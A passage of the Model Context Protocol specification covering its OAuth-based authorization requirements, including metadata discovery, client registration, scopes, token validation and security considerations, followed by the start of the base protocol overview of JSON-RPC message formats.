MCP servers **MUST** implement the OAuth 2.0 Protected Resource Metadata ([RFC9728](https://datatracker.ietf.org/doc/html/rfc9728))
specification to indicate the locations of authorization servers. The Protected Resource Metadata document returned by the MCP server **MUST** include
the `authorization_servers` field containing at least one authorization server.
The specific use of `authorization_servers` is beyond the scope of this specification; implementers should consult
OAuth 2.0 Protected Resource Metadata ([RFC9728](https://datatracker.ietf.org/doc/html/rfc9728)) for
guidance on implementation details.
Implementors should note that Protected Resource Metadata documents can define multiple authorization servers. The responsibility for selecting which authorization server to use lies with the MCP client, following the guidelines specified in
[RFC9728 Section 7.6 "Authorization Servers"](https://datatracker.ietf.org/doc/html/rfc9728#name-authorization-servers).
### Protected Resource Metadata Discovery Requirements
MCP servers **MUST** implement one of the following discovery mechanisms to provide authorization server location information to MCP clients:
1. **WWW-Authenticate Header**: Include the resource metadata URL in the `WWW-Authenticate` HTTP header under `resource_metadata` when returning `401 Unauthorized` responses, as described in [RFC9728 Section 5.1](https://datatracker.ietf.org/doc/html/rfc9728#name-www-authenticate-response).
2. **Well-Known URI**: Serve metadata at a well-known URI as specified in [RFC9728](https://datatracker.ietf.org/doc/html/rfc9728). This can be either:
* At the path of the server's MCP endpoint: `https://example.com/public/mcp` could host metadata at `https://example.com/.well-known/oauth-protected-resource/public/mcp`
* At the root: `https://example.com/.well-known/oauth-protected-resource`
MCP clients **MUST** support both discovery mechanisms and use the resource metadata URL from the parsed `WWW-Authenticate` headers when present; otherwise, they **MUST** fall back to constructing and requesting the well-known URIs in the order listed above.
MCP servers **SHOULD** include a `scope` parameter in the `WWW-Authenticate` header as defined in
[RFC 6750 Section 3](https://datatracker.ietf.org/doc/html/rfc6750#section-3)
to indicate the scopes required for accessing the resource. This provides clients with immediate
guidance on the appropriate scopes to request during authorization,
following the principle of least privilege and preventing clients from requesting excessive permissions.
The scopes included in the `WWW-Authenticate` challenge **MAY** match `scopes_supported`, be a subset
or superset of it, or an alternative collection that is neither a strict subset nor
superset. Clients **MUST NOT** assume any particular set relationship between the challenged
scope set and `scopes_supported`. Clients **MUST** treat the scopes provided in the
challenge as authoritative for satisfying the current request. Servers **SHOULD** strive for
consistency in how they construct scope sets but they are not required to surface every dynamically
issued scope through `scopes_supported`.
Example 401 response with scope guidance:
```http theme={null}
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Bearer resource_metadata="https://mcp.example.com/.well-known/oauth-protected-resource",
scope="files:read"
```
MCP clients **MUST** be able to parse `WWW-Authenticate` headers and respond appropriately to `HTTP 401 Unauthorized` responses from the MCP server.
If the `scope` parameter is absent, clients **SHOULD** apply the fallback behavior defined in the [Scope Selection Strategy](#scope-selection-strategy) section.
### Authorization Server Metadata Discovery
To handle different issuer URL formats and ensure interoperability with both OAuth 2.0 Authorization Server Metadata and OpenID Connect Discovery 1.0 specifications, MCP clients **MUST** attempt multiple well-known endpoints when discovering authorization server metadata.
The discovery approach is based on [RFC8414 Section 3.1 "Authorization Server Metadata Request"](https://datatracker.ietf.org/doc/html/rfc8414#section-3.1) for OAuth 2.0 Authorization Server Metadata discovery and [RFC8414 Section 5 "Compatibility Notes"](https://datatracker.ietf.org/doc/html/rfc8414#section-5) for OpenID Connect Discovery 1.0 interoperability.
For issuer URLs with path components (e.g., `https://auth.example.com/tenant1`), clients **MUST** try endpoints in the following priority order:
1. OAuth 2.0 Authorization Server Metadata with path insertion: `https://auth.example.com/.well-known/oauth-authorization-server/tenant1`
2. OpenID Connect Discovery 1.0 with path insertion: `https://auth.example.com/.well-known/openid-configuration/tenant1`
3. OpenID Connect Discovery 1.0 path appending: `https://auth.example.com/tenant1/.well-known/openid-configuration`
For issuer URLs without path components (e.g., `https://auth.example.com`), clients **MUST** try:
1. OAuth 2.0 Authorization Server Metadata: `https://auth.example.com/.well-known/oauth-authorization-server`
2. OpenID Connect Discovery 1.0: `https://auth.example.com/.well-known/openid-configuration`
### Authorization Server Discovery Sequence Diagram
The following diagram outlines an example flow:
```mermaid theme={null}
sequenceDiagram
participant C as Client
participant M as MCP Server (Resource Server)
participant A as Authorization Server
Note over C: Attempt unauthenticated MCP request
C->>M: MCP request without token
M-->>C: HTTP 401 Unauthorized (may include WWW-Authenticate header)
alt Header includes resource_metadata
Note over C: Extract resource_metadata URL from header
C->>M: GET resource_metadata URI
M-->>C: Resource metadata with authorization server URL
else No resource_metadata in header
Note over C: Fallback to well-known URI probing
Note over M: _Not applicable if the MCP server is at the root_
C->>M: GET /.well-known/oauth-protected-resource/mcp
alt Sub-path metadata found
M-->>C: Resource metadata with authorization server URL
else Sub-path not found
C->>M: GET /.well-known/oauth-protected-resource
alt Root metadata found
M-->>C: Resource metadata with authorization server URL
else Root metadata not found
Note over C: Abort or use pre-configured values
end
end
end
Note over C: Validate RS metadata, build AS metadata URL
C->>A: GET Authorization server metadata endpoint
Note over C,A: Try OAuth 2.0 and OpenID Connect discovery endpoints in priority order
A-->>C: Authorization server metadata
Note over C,A: OAuth 2.1 authorization flow happens here
C->>A: Token request
A-->>C: Access token
C->>M: MCP request with access token
M-->>C: MCP response
Note over C,M: MCP communication continues with valid token
```
## Client Registration Approaches
MCP supports three client registration mechanisms. Choose based on your scenario:
* **Client ID Metadata Documents**: When client and server have no prior relationship (most common)
* **Pre-registration**: When client and server have an existing relationship
* **Dynamic Client Registration**: For backwards compatibility or specific requirements
Clients supporting all options **SHOULD** follow the following priority order:
1. Use pre-registered client information for the server if the client has it available
2. Use Client ID Metadata Documents if the Authorization Server indicates if the server supports it (via `client_id_metadata_document_supported` in OAuth Authorization Server Metadata)
3. Use Dynamic Client Registration as a fallback if the Authorization Server supports it (via `registration_endpoint` in OAuth Authorization Server Metadata)
4. Prompt the user to enter the client information if no other option is available
### Client ID Metadata Documents
MCP clients and authorization servers **SHOULD** support OAuth Client ID Metadata Documents as specified in
[OAuth Client ID Metadata Document](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-client-id-metadata-document-00).
This approach enables clients to use HTTPS URLs as client identifiers, where the URL points to a JSON document
containing client metadata. This addresses the common MCP scenario where servers and clients have
no pre-existing relationship.
#### Implementation Requirements
MCP implementations supporting Client ID Metadata Documents **MUST** follow the requirements specified in
[OAuth Client ID Metadata Document](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-client-id-metadata-document-00).
Key requirements include:
**For MCP Clients:**
* Clients **MUST** host their metadata document at an HTTPS URL following RFC requirements
* The `client_id` URL **MUST** use the "https" scheme and contain a path component, e.g. `https://example.com/client.json`
* The metadata document **MUST** include at least the following properties: `client_id`, `client_name`, `redirect_uris`
* Clients **MUST** ensure the `client_id` value in the metadata matches the document URL exactly
* Clients **MAY** use `private_key_jwt` for client authentication (e.g., for requests to the token endpoint) with appropriate JWKS configuration as described in [Section 6.2 of Client ID Metadata Document](https://www.ietf.org/archive/id/draft-ietf-oauth-client-id-metadata-document-00.html#section-6.2)
**For Authorization Servers:**
* **SHOULD** fetch metadata documents when encountering URL-formatted client\_ids
* **MUST** validate that the fetched document's `client_id` matches the URL exactly
* **SHOULD** cache metadata respecting HTTP cache headers
* **MUST** validate redirect URIs presented in an authorization request against those in the metadata document
* **MUST** validate the document structure is valid JSON and contains required fields
* **SHOULD** follow the security considerations in [Section 6 of Client ID Metadata Document](https://www.ietf.org/archive/id/draft-ietf-oauth-client-id-metadata-document-00.html#section-6)
#### Example Metadata Document
```json theme={null}
{
"client_id": "https://app.example.com/oauth/client-metadata.json",
"client_name": "Example MCP Client",
"client_uri": "https://app.example.com",
"logo_uri": "https://app.example.com/logo.png",
"redirect_uris": [
"http://127.0.0.1:3000/callback",
"http://localhost:3000/callback"
],
"grant_types": ["authorization_code"],
"response_types": ["code"],
"token_endpoint_auth_method": "none"
}
```
#### Client ID Metadata Documents Flow
The following diagram illustrates the complete flow when using Client ID Metadata Documents:
```mermaid theme={null}
sequenceDiagram
participant User
participant Client as MCP Client
participant Server as Authorization Server
participant Metadata as Metadata Endpoint (Client's HTTPS URL)
participant Resource as MCP Server
Note over Client,Metadata: Client hosts metadata at https://app.example.com/oauth/metadata.json
User->>Client: Initiates connection to MCP Server
Client->>Server: Authorization Request client_id=https://app.example.com/oauth/metadata.json redirect_uri=http://localhost:3000/callback
Server->>User: Authentication prompt
User->>Server: Provides credentials
Note over Server: Authenticates user
Note over Server: Detects URL-formatted client_id
Server->>Metadata: GET https://app.example.com/oauth/metadata.json
Metadata-->>Server: JSON Metadata Document {client_id, client_name, redirect_uris, ...}
Note over Server: Validates: 1. client_id matches URL 2. redirect_uri in allowed list 3. Document structure valid 4. (Optional) Domain allowed via trust policy
alt Validation Success
Server->>User: Display consent page with client_name
User->>Server: Approves access
Server->>Client: Authorization code via redirect_uri
Client->>Server: Exchange code for token client_id=https://app.example.com/oauth/metadata.json
Server-->>Client: Access token
Client->>Resource: MCP requests with access token
Resource-->>Client: MCP responses
else Validation Failure
Server->>User: Error response error=invalid_client or invalid_request
end
Note over Server: Cache metadata for future requests (respecting HTTP cache headers)
```
#### Discovery
Authorization servers advertise that they support clients using Client ID Metadata Documents by including the following property in their OAuth Authorization Server metadata:
```json theme={null}
{
"client_id_metadata_document_supported": true
}
```
MCP clients **SHOULD** check for this capability and **MAY** fall back to Dynamic Client Registration
or pre-registration if unavailable.
### Preregistration
MCP clients **SHOULD** support an option for static client credentials such as those supplied by a preregistration flow. This could be:
1. Hardcode a client ID (and, if applicable, client credentials) specifically for the MCP client to use when
interacting with that authorization server, or
2. Present a UI to users that allows them to enter these details, after registering an
OAuth client themselves (e.g., through a configuration interface hosted by the
server).
### Dynamic Client Registration
MCP clients and authorization servers **MAY** support the
OAuth 2.0 Dynamic Client Registration Protocol [RFC7591](https://datatracker.ietf.org/doc/html/rfc7591)
to allow MCP clients to obtain OAuth client IDs without user interaction.
This option is included for backwards compatibility with earlier versions of the MCP authorization spec.
## Scope Selection Strategy
When implementing authorization flows, MCP clients **SHOULD** follow the principle of least privilege by requesting
only the scopes necessary for their intended operations. During the initial authorization handshake, MCP clients
**SHOULD** follow this priority order for scope selection:
1. **Use `scope` parameter** from the initial `WWW-Authenticate` header in the 401 response, if provided
2. **If `scope` is not available**, use all scopes defined in `scopes_supported` from the Protected Resource Metadata document, omitting the `scope` parameter if `scopes_supported` is undefined.
This approach accommodates the general-purpose nature of MCP clients, which typically lack domain-specific knowledge to make informed decisions about individual scope selection. Requesting all available scopes allows the authorization server and end-user to determine appropriate permissions during the consent process.
This approach minimizes user friction while following the principle of least privilege.
The `scopes_supported` field is intended to represent the minimal set of scopes necessary
for basic functionality (see [Scope Minimization](/specification/2025-11-25/basic/security_best_practices#scope-minimization)),
with additional scopes requested incrementally through the step-up authorization flow steps
described in the [Scope Challenge Handling](#scope-challenge-handling) section.
## Authorization Flow Steps
The complete Authorization flow proceeds as follows:
```mermaid theme={null}
sequenceDiagram
participant B as User-Agent (Browser)
participant C as Client
participant M as MCP Server (Resource Server)
participant A as Authorization Server
C->>M: MCP request without token
M->>C: HTTP 401 Unauthorized with WWW-Authenticate header
Note over C: Extract resource_metadata URL from WWW-Authenticate
C->>M: Request Protected Resource Metadata
M->>C: Return metadata
Note over C: Parse metadata and extract authorization server(s) Client determines AS to use
C->>A: GET Authorization server metadata endpoint
Note over C,A: Try OAuth 2.0 and OpenID Connect discovery endpoints in priority order
A-->>C: Authorization server metadata
alt Client ID Metadata Documents
Note over C: Client uses HTTPS URL as client_id
Note over A: Server detects URL-formatted client_id
A->>C: Fetch metadata from client_id URL
C-->>A: JSON metadata document
Note over A: Validate metadata and redirect_uris
else Dynamic client registration
C->>A: POST /register
A->>C: Client Credentials
else Pre-registered client
Note over C: Use existing client_id
end
Note over C: Generate PKCE parameters Include resource parameter Apply scope selection strategy
C->>B: Open browser with authorization URL + code_challenge + resource
B->>A: Authorization request with resource parameter
Note over A: User authorizes
A->>B: Redirect to callback with authorization code
B->>C: Authorization code callback
C->>A: Token request + code_verifier + resource
A->>C: Access token (+ refresh token)
C->>M: MCP request with access token
M-->>C: MCP response
Note over C,M: MCP communication continues with valid token
```
## Resource Parameter Implementation
MCP clients **MUST** implement Resource Indicators for OAuth 2.0 as defined in [RFC 8707](https://www.rfc-editor.org/rfc/rfc8707.html)
to explicitly specify the target resource for which the token is being requested. The `resource` parameter:
1. **MUST** be included in both authorization requests and token requests.
2. **MUST** identify the MCP server that the client intends to use the token with.
3. **MUST** use the canonical URI of the MCP server as defined in [RFC 8707 Section 2](https://www.rfc-editor.org/rfc/rfc8707.html#name-access-token-request).
### Canonical Server URI
For the purposes of this specification, the canonical URI of an MCP server is defined as the resource identifier as specified in
[RFC 8707 Section 2](https://www.rfc-editor.org/rfc/rfc8707.html#section-2) and aligns with the `resource` parameter in
[RFC 9728](https://datatracker.ietf.org/doc/html/rfc9728).
MCP clients **SHOULD** provide the most specific URI that they can for the MCP server they intend to access, following the guidance in [RFC 8707](https://www.rfc-editor.org/rfc/rfc8707). While the canonical form uses lowercase scheme and host components, implementations **SHOULD** accept uppercase scheme and host components for robustness and interoperability.
Examples of valid canonical URIs:
* `https://mcp.example.com/mcp`
* `https://mcp.example.com`
* `https://mcp.example.com:8443`
* `https://mcp.example.com/server/mcp` (when path component is necessary to identify individual MCP server)
Examples of invalid canonical URIs:
* `mcp.example.com` (missing scheme)
* `https://mcp.example.com#fragment` (contains fragment)
> **Note:** While both `https://mcp.example.com/` (with trailing slash) and `https://mcp.example.com` (without trailing slash) are technically valid absolute URIs according to [RFC 3986](https://www.rfc-editor.org/rfc/rfc3986), implementations **SHOULD** consistently use the form without the trailing slash for better interoperability unless the trailing slash is semantically significant for the specific resource.
For example, if accessing an MCP server at `https://mcp.example.com`, the authorization request would include:
```
&resource=https%3A%2F%2Fmcp.example.com
```
MCP clients **MUST** send this parameter regardless of whether authorization servers support it.
## Access Token Usage
### Token Requirements
Access token handling when making requests to MCP servers **MUST** conform to the requirements defined in
[OAuth 2.1 Section 5 "Resource Requests"](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-5).
Specifically:
1. MCP client **MUST** use the Authorization request header field defined in
[OAuth 2.1 Section 5.1.1](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-5.1.1):
```
Authorization: Bearer
```
Note that authorization **MUST** be included in every HTTP request from client to server,
even if they are part of the same logical session.
2. Access tokens **MUST NOT** be included in the URI query string
Example request:
```http theme={null}
GET /mcp HTTP/1.1
Host: mcp.example.com
Authorization: Bearer eyJhbGciOiJIUzI1NiIs...
```
### Token Handling
MCP servers, acting in their role as an OAuth 2.1 resource server, **MUST** validate access tokens as described in
[OAuth 2.1 Section 5.2](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-5.2).
MCP servers **MUST** validate that access tokens were issued specifically for them as the intended audience,
according to [RFC 8707 Section 2](https://www.rfc-editor.org/rfc/rfc8707.html#section-2).
If validation fails, servers **MUST** respond according to
[OAuth 2.1 Section 5.3](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-5.3)
error handling requirements. Invalid or expired tokens **MUST** receive a HTTP 401
response.
MCP clients **MUST NOT** send tokens to the MCP server other than ones issued by the MCP server's authorization server.
MCP servers **MUST** only accept tokens that are valid for use with their
own resources.
MCP servers **MUST NOT** accept or transit any other tokens.
## Error Handling
Servers **MUST** return appropriate HTTP status codes for authorization errors:
| Status Code | Description | Usage |
| ----------- | ------------ | ------------------------------------------ |
| 401 | Unauthorized | Authorization required or token invalid |
| 403 | Forbidden | Invalid scopes or insufficient permissions |
| 400 | Bad Request | Malformed authorization request |
### Scope Challenge Handling
This section covers handling insufficient scope errors during runtime operations when
a client already has a token but needs additional permissions. This follows the error
handling patterns defined in [OAuth 2.1 Section 5](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-5)
and leverages the metadata fields from [RFC 9728 (OAuth 2.0 Protected Resource Metadata)](https://datatracker.ietf.org/doc/html/rfc9728).
#### Runtime Insufficient Scope Errors
When a client makes a request with an access token with insufficient
scope during runtime operations, the server **SHOULD** respond with:
* `HTTP 403 Forbidden` status code (per [RFC 6750 Section 3.1](https://datatracker.ietf.org/doc/html/rfc6750#section-3.1))
* `WWW-Authenticate` header with the `Bearer` scheme and additional parameters:
* `error="insufficient_scope"` - indicating the specific type of authorization failure
* `scope="required_scope1 required_scope2"` - specifying the minimum scopes needed for the operation
* `resource_metadata` - the URI of the Protected Resource Metadata document (for consistency with 401 responses)
* `error_description` (optional) - human-readable description of the error
**Server Scope Management**: When responding with insufficient scope errors, servers
**SHOULD** include the scopes needed to satisfy the current request in the `scope`
parameter.
Servers have flexibility in determining which scopes to include:
* **Minimum approach**: Include the newly-required scopes for the specific operation. Include any existing granted scopes as well, if they are required, to prevent clients from losing previously granted permissions.
* **Recommended approach**: Include both existing relevant scopes and newly required scopes to prevent clients from losing previously granted permissions
* **Extended approach**: Include existing scopes, newly required scopes, and related scopes that commonly work together
The choice depends on the server's assessment of user experience impact and authorization friction.
Servers **SHOULD** be consistent in their scope inclusion strategy to provide predictable behavior for clients.
Servers **SHOULD** consider the user experience impact when determining which scopes to include in the
response, as misconfigured scopes may require frequent user interaction.
Example insufficient scope response:
```http theme={null}
HTTP/1.1 403 Forbidden
WWW-Authenticate: Bearer error="insufficient_scope",
scope="files:read files:write user:profile",
resource_metadata="https://mcp.example.com/.well-known/oauth-protected-resource",
error_description="Additional file write permission required"
```
#### Step-Up Authorization Flow
Clients will receive scope-related errors during initial authorization or at runtime (`insufficient_scope`).
Clients **SHOULD** respond to these errors by requesting a new access token with an increased set of scopes via a step-up authorization flow or handle the errors in other, appropriate ways.
Clients acting on behalf of a user **SHOULD** attempt the step-up authorization flow. Clients acting on their own behalf (`client_credentials` clients)
**MAY** attempt the step-up authorization flow or abort the request immediately.
The flow is as follows:
1. **Parse error information** from the authorization server response or `WWW-Authenticate` header
2. **Determine required scopes** as outlined in [Scope Selection Strategy](#scope-selection-strategy).
3. **Initiate (re-)authorization** with the determined scope set
4. **Retry the original request** with the new authorization no more than a few times and treat this as a permanent authorization failure
Clients **SHOULD** implement retry limits and **SHOULD** track scope upgrade attempts to avoid
repeated failures for the same resource and operation combination.
## Security Considerations
Implementations **MUST** follow OAuth 2.1 security best practices as laid out in [OAuth 2.1 Section 7. "Security Considerations"](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#name-security-considerations).
### Token Audience Binding and Validation
[RFC 8707](https://www.rfc-editor.org/rfc/rfc8707.html) Resource Indicators provide critical security benefits by binding tokens to their intended
audiences **when the Authorization Server supports the capability**. To enable current and future adoption:
* MCP clients **MUST** include the `resource` parameter in authorization and token requests as specified in the [Resource Parameter Implementation](#resource-parameter-implementation) section
* MCP servers **MUST** validate that tokens presented to them were specifically issued for their use
The [Security Best Practices document](/specification/2025-11-25/basic/security_best_practices#token-passthrough)
outlines why token audience validation is crucial and why token passthrough is explicitly forbidden.
### Token Theft
Attackers who obtain tokens stored by the client, or tokens cached or logged on the server can access protected resources with
requests that appear legitimate to resource servers.
Clients and servers **MUST** implement secure token storage and follow OAuth best practices,
as outlined in [OAuth 2.1, Section 7.1](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-7.1).
Authorization servers **SHOULD** issue short-lived access tokens to reduce the impact of leaked tokens.
For public clients, authorization servers **MUST** rotate refresh tokens as described in [OAuth 2.1 Section 4.3.1 "Token Endpoint Extension"](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-4.3.1).
### Communication Security
Implementations **MUST** follow [OAuth 2.1 Section 1.5 "Communication Security"](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-1.5).
Specifically:
1. All authorization server endpoints **MUST** be served over HTTPS.
2. All redirect URIs **MUST** be either `localhost` or use HTTPS.
### Authorization Code Protection
An attacker who has gained access to an authorization code contained in an authorization response can try to redeem the authorization code for an access token or otherwise make use of the authorization code.
(Further described in [OAuth 2.1 Section 7.5](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-7.5))
To mitigate this, MCP clients **MUST** implement PKCE according to [OAuth 2.1 Section 7.5.2](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-7.5.2) and **MUST** verify PKCE support before proceeding with authorization.
PKCE helps prevent authorization code interception and injection attacks by requiring clients to create a secret verifier-challenge pair, ensuring that only the original requestor can exchange an authorization code for tokens.
MCP clients **MUST** use the `S256` code challenge method when technically capable, as required by [OAuth 2.1 Section 4.1.1](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-4.1.1).
Since OAuth 2.1 and PKCE specifications do not define a mechanism for clients to discover PKCE support, MCP clients **MUST** rely on authorization server metadata to verify this capability:
* **OAuth 2.0 Authorization Server Metadata**: If `code_challenge_methods_supported` is absent, the authorization server does not support PKCE and MCP clients **MUST** refuse to proceed.
* **OpenID Connect Discovery 1.0**: While the [OpenID Provider Metadata](https://openid.net/specs/openid-connect-discovery-1_0.html#ProviderMetadata) does not define `code_challenge_methods_supported`, this field is commonly included by OpenID providers. MCP clients **MUST** verify the presence of `code_challenge_methods_supported` in the provider metadata response. If the field is absent, MCP clients **MUST** refuse to proceed.
Authorization servers providing OpenID Connect Discovery 1.0 **MUST** include `code_challenge_methods_supported` in their metadata to ensure MCP compatibility.
### Open Redirection
An attacker may craft malicious redirect URIs to direct users to phishing sites.
MCP clients **MUST** have redirect URIs registered with the authorization server.
Authorization servers **MUST** validate exact redirect URIs against pre-registered values to prevent redirection attacks.
MCP clients **SHOULD** use and verify state parameters in the authorization code flow
and discard any results that do not include or have a mismatch with the original state.
Authorization servers **MUST** take precautions to prevent redirecting user agents to untrusted URI's, following suggestions laid out in [OAuth 2.1 Section 7.12.2](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13#section-7.12.2)
Authorization servers **SHOULD** only automatically redirect the user agent if it trusts the redirection URI. If the URI is not trusted, the authorization server MAY inform the user and rely on the user to make the correct decision.
### Client ID Metadata Document Security
When implementing Client ID Metadata Documents, authorization servers **MUST** consider the security implications
detailed in [OAuth Client ID Metadata Document, Section 6](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-client-id-metadata-document-00#name-security-considerations).
Key considerations include:
#### Authorization Server Abuse Protection
The authorization server takes a URL as input from an unknown client and fetches that URL.
A malicious client could use this to trigger the authorization server to make requests to arbitrary URLs,
such as requests to private administration endpoints the authorization server has access to.
Authorization servers fetching metadata documents **SHOULD** consider
[Server-Side Request Forgery (SSRF)](https://developer.mozilla.org/docs/Web/Security/Attacks/SSRF) risks, as described in [OAuth Client ID Metadata Document: Server Side Request Forgery (SSRF) Attacks](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-client-id-metadata-document-00#name-server-side-request-forgery).
#### Localhost Redirect URI Risks
Client ID Metadata Documents cannot prevent `localhost` URL impersonation by themselves. An attacker can claim to be any client by:
1. Providing the legitimate client's metadata URL as their `client_id`
2. Binding to the any `localhost` port, and providing that address as the redirect\_uri
3. Receiving the authorization code via the redirect when the user approves
The server will see the legitimate client's metadata document and the user will see the legitimate client's name, making attack detection difficult.
Authorization servers:
* **SHOULD** display additional warnings for `localhost`-only redirect URIs
* **MAY** require additional attestation mechanisms for enhanced security
* **MUST** clearly display the redirect URI hostname during authorization
#### Trust Policies
Authorization servers **MAY** implement domain-based trust policies:
* Allowlists for trusted domains (for protected servers)
* Accept any HTTPS `client_id` (for open servers)
* Reputation checks for unknown domains
* Restrictions based on domain age or certificate validation
* Display the CIMD and other associated client hostnames prominently to prevent phishing
Servers maintain full control over their access policies.
### Confused Deputy Problem
Attackers can exploit MCP servers acting as intermediaries to third-party APIs, leading to [confused deputy vulnerabilities](/specification/2025-11-25/basic/security_best_practices#confused-deputy-problem).
By using stolen authorization codes, they can obtain access tokens without user consent.
MCP proxy servers using static client IDs **MUST** obtain user consent for each dynamically
registered client before forwarding to third-party authorization servers (which may require additional consent).
### Access Token Privilege Restriction
An attacker can gain unauthorized access or otherwise compromise an MCP server if the server accepts tokens issued for other resources.
This vulnerability has two critical dimensions:
1. **Audience validation failures.** When an MCP server doesn't verify that tokens were specifically intended for it (for example, via the audience claim, as mentioned in [RFC9068](https://www.rfc-editor.org/rfc/rfc9068.html)), it may accept tokens originally issued for other services. This breaks a fundamental OAuth security boundary, allowing attackers to reuse legitimate tokens across different services than intended.
2. **Token passthrough.** If the MCP server not only accepts tokens with incorrect audiences but also forwards these unmodified tokens to downstream services, it can potentially cause the ["confused deputy" problem](#confused-deputy-problem), where the downstream API may incorrectly trust the token as if it came from the MCP server or assume the token was validated by the upstream API. See the [Token Passthrough section](/specification/2025-11-25/basic/security_best_practices#token-passthrough) of the Security Best Practices guide for additional details.
MCP servers **MUST** validate access tokens before processing the request, ensuring the access token is issued specifically for the MCP server, and take all necessary steps to ensure no data is returned to unauthorized parties.
A MCP server **MUST** follow the guidelines in [OAuth 2.1 - Section 5.2](https://www.ietf.org/archive/id/draft-ietf-oauth-v2-1-13.html#section-5.2) to validate inbound tokens.
MCP servers **MUST** only accept tokens specifically intended for themselves and **MUST** reject tokens that do not include them in the audience claim or otherwise verify that they are the intended recipient of the token. See the [Security Best Practices Token Passthrough section](/specification/2025-11-25/basic/security_best_practices#token-passthrough) for details.
If the MCP server makes requests to upstream APIs, it may act as an OAuth client to them. The access token used at the upstream API is a separate token, issued by the upstream authorization server. The MCP server **MUST NOT** pass through the token it received from the MCP client.
MCP clients **MUST** implement and use the `resource` parameter as defined in [RFC 8707 - Resource Indicators for OAuth 2.0](https://www.rfc-editor.org/rfc/rfc8707.html)
to explicitly specify the target resource for which the token is being requested. This requirement aligns with the recommendation in
[RFC 9728 Section 7.4](https://datatracker.ietf.org/doc/html/rfc9728#section-7.4). This ensures that access tokens are bound to their intended resources and
cannot be misused across different services.
## MCP Authorization Extensions
There are several authorization extensions to the core protocol that define additional authorization mechanisms. These extensions are:
* **Optional** - Implementations can choose to adopt these extensions
* **Additive** - Extensions do not modify or break core protocol functionality; they add new capabilities while preserving core protocol behavior
* **Composable** - Extensions are modular and designed to work together without conflicts, allowing implementations to adopt multiple extensions simultaneously
* **Versioned independently** - Extensions follow the core MCP versioning cycle but may adopt independent versioning as needed
A list of supported extensions can be found in the [MCP Authorization Extensions](https://github.com/modelcontextprotocol/ext-auth) repository.
# Overview
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/index
**Protocol Revision**: 2025-11-25
The Model Context Protocol consists of several key components that work together:
* **Base Protocol**: Core JSON-RPC message types
* **Lifecycle Management**: Connection initialization, capability negotiation, and
session control
* **Authorization**: Authentication and authorization framework for HTTP-based transports
* **Server Features**: Resources, prompts, and tools exposed by servers
* **Client Features**: Sampling and root directory lists provided by clients
* **Utilities**: Cross-cutting concerns like logging and argument completion
All implementations **MUST** support the base protocol and lifecycle management
components. Other components **MAY** be implemented based on the specific needs of the
application.
These protocol layers establish clear separation of concerns while enabling rich
interactions between clients and servers. The modular design allows implementations to
support exactly the features they need.
## Messages
All messages between MCP clients and servers **MUST** follow the
[JSON-RPC 2.0](https://www.jsonrpc.org/specification) specification. The protocol defines
these types of messages:
### Requests
[Requests](/specification/2025-11-25/schema#jsonrpcrequest) are sent from the client to the server or vice versa, to initiate an operation.
```typescript theme={null}
{
jsonrpc: "2.0";
id: string | number;
method: string;
params?: {
[key: string]: unknown;
};
}
```
* Requests **MUST** include a string or integer ID.
* Unlike base JSON-RPC, the ID **MUST NOT** be `null`.
* The request ID **MUST NOT** have been previously used by the requestor within the same
session.
### Responses
Responses are sent in reply to requests, containing either the result or error of the operation.
#### Result Responses
[Result responses](/specification/2025-11-25/schema#jsonrpcresultresponse) are sent when the operation completes successfully.
```typescript theme={null}
{
jsonrpc: "2.0";
id: string | number;
result: {
[key: string]: unknown;
}
}
```
* Result responses **MUST** include the same ID as the request they correspond to.
* Result responses **MUST** include a `result` field.
* The `result` **MAY** follow any JSON object structure.
#### Error Responses
[Error responses](/specification/2025-11-25/schema#jsonrpcerrorresponse) are sent when the operation fails or encounters an error.
```typescript theme={null}
{
jsonrpc: "2.0";
id?: string | number;
error: {
code: number;
message: string;
data?: unknown;
}
}
```
* Error responses **MUST** include the same ID as the request they correspond to (except in error cases where the ID could not be read due a malformed request).
* Error responses **MUST** include an `error` field with a `code` and `message`.
* Error codes **MUST** be integers.
### Notifications
[Notifications](/specification/2025-11-25/schema#jsonrpcnotification) are sent from the client to the server or vice versa, as a one-way message.
The receiver **MUST NOT** send a response.
```typescript theme={null}
{
jsonrpc: "2.0";
method: string;
params?: {
[key: string]: unknown;
};
}
```
* Notifications **MUST NOT** include an ID.
## Auth
MCP provides an [Authorization](/specification/2025-11-25/basic/authorization) framework for use with HTTP.
Implementations using an HTTP-based transport **SHOULD** conform to this specification,
whereas implementations using STDIO transport **SHOULD NOT** follow this specification,
and instead retrieve credentials from the environment.
Additionally, clients and servers **MAY** negotiate their own custom authentication and
authorization strategies.
For further discussions and contributions to the evolution of MCP's auth mechanisms, join
us in
[GitHub Discussions](https://github.com/modelcontextprotocol/specification/discussions)
to help shape the future of the protocol!
## Schema
The full specification of the protocol is defined as a
[TypeScript schema](https://github.com/modelcontextprotocol/specification/blob/main/schema/2025-11-25/schema.ts).
This is the source of truth for all protocol messages and structures.
There is also a
[JSON Schema](https://github.com/modelcontextprotocol/specification/blob/main/schema/2025-11-25/schema.json),
which is automatically generated from the TypeScript source of truth, for use with
various automated tooling.
## JSON Schema Usage
The Model Context Protocol uses JSON Schema for validation throughout the protocol. This section clarifies how JSON Schema should be used within MCP messages.
### Schema Dialect
MCP supports JSON Schema with the following rules:
1. **Default dialect**: When a schema does not include a `$schema` field, it defaults to [JSON Schema 2020-12](https://json-schema.org/draft/2020-12/schema)
